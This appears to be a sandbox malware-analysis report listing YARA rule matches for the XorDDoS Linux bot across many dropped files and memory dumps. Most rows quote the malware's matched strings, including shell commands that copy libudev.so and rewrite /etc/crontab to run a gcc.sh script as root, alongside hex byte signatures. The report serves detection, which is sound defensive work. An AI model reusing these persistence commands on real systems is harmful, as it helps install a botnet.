/lib/libudev.so	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/lib/libudev.so	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/lib/libudev.so	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/wzhmvohlxs	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/wzhmvohlxs	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/wzhmvohlxs	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/wzhmvohlxs	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/emnaztxelb	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/hiueshutol	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/hiueshutol	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/hiueshutol	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/hiueshutol	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/mhvrcmaysv	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/mhvrcmaysv	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/mhvrcmaysv	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/mhvrcmaysv	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/lnmgbribvb	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/lnmgbribvb	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/lnmgbribvb	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/lnmgbribvb	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/hgfzmygnbx	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/hgfzmygnbx	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/wdcujvrbpo	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/wdcujvrbpo	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/hgfzmygnbx	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/hgfzmygnbx	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/wdcujvrbpo	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/wdcujvrbpo	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/dezqblvxuy	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/dezqblvxuy	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/dezqblvxuy	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/dezqblvxuy	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/chdmwyeiia	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/chdmwyeiia	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/chdmwyeiia	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/chdmwyeiia	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ckxgqrmzxa	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ckxgqrmzxa	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/ckxgqrmzxa	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/ckxgqrmzxa	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/lsodknzpps	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/lsodknzpps	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/lsodknzpps	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/lsodknzpps	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/eoqlmyvucn	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/eoqlmyvucn	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/eoqlmyvucn	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/eoqlmyvucn	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/cjfywultqo	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/cjfywultqo	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/cjfywultqo	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/cjfywultqo	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/zbksjhrfms	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/zbksjhrfms	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/zbksjhrfms	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/zbksjhrfms	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
Click to see the 52 entries

Memory Dumps

Source	Rule	Description	Author	Strings
9750.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9750.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9750.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9750.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10071.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10071.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10071.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10071.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10181.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10181.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10181.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10181.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10423.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10423.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10423.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10423.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9904.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9904.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9904.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9904.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10445.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10445.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10445.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10445.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10159.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10159.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10159.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10159.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9684.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9684.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9684.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9684.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10412.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10412.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10412.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10412.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9761.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9761.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
